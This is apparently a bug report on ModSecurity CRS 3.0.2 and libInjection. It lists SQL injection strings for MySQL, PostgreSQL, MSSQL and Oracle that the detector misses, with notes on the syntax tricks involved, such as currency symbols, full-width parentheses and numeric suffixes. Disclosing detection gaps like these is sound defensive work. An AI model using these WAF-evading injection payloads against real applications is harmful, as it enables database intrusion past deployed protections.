Multiple False Negatives

[samngms]

Tested with ModSecurity for IIS 2.9.2, CRS 3.0.2

I don't know which version of libInjection they are using.

// MySQL 5.7
// I also don't know what it means, but it works on MySQL, basically, .1e(2) = 2
a' or 3>.1e(2) #

// PgSQL 9.6
// |/ is sq root, ||/ is cubic root, works for both
0 or |/ 25 > 1
a' or $foobar$a'b$foobar$ != 'y

// MSSQL 2016 Express
// note there is a space b/w < and >, I forgot whether it works for != or not
10 or 2 < > 1 
// the following works with many other currency symbols
// and works with or without a space b/w "or" and the currency symbol 
a' or€2 > 0 -- 

// Oracle XE (11g)
// ^= means !=, but weird enough, libInjection detects ¬=
0 or 2^=1 
// note the first （ is a full width open parenthesis
// libInjection converts full width open parenthesis to half width open parenthesis
// and therefore wrongly close the q quote after a, but in fact, the correct string should be [a') b d e]
x' or q'（a)' b d e（' != 'x 
// in Orace 1d means 1 (decimal), and if the 'd' exists, Oracle always takes it
// same for 1f (floating point)
x' + 1dor 2>'1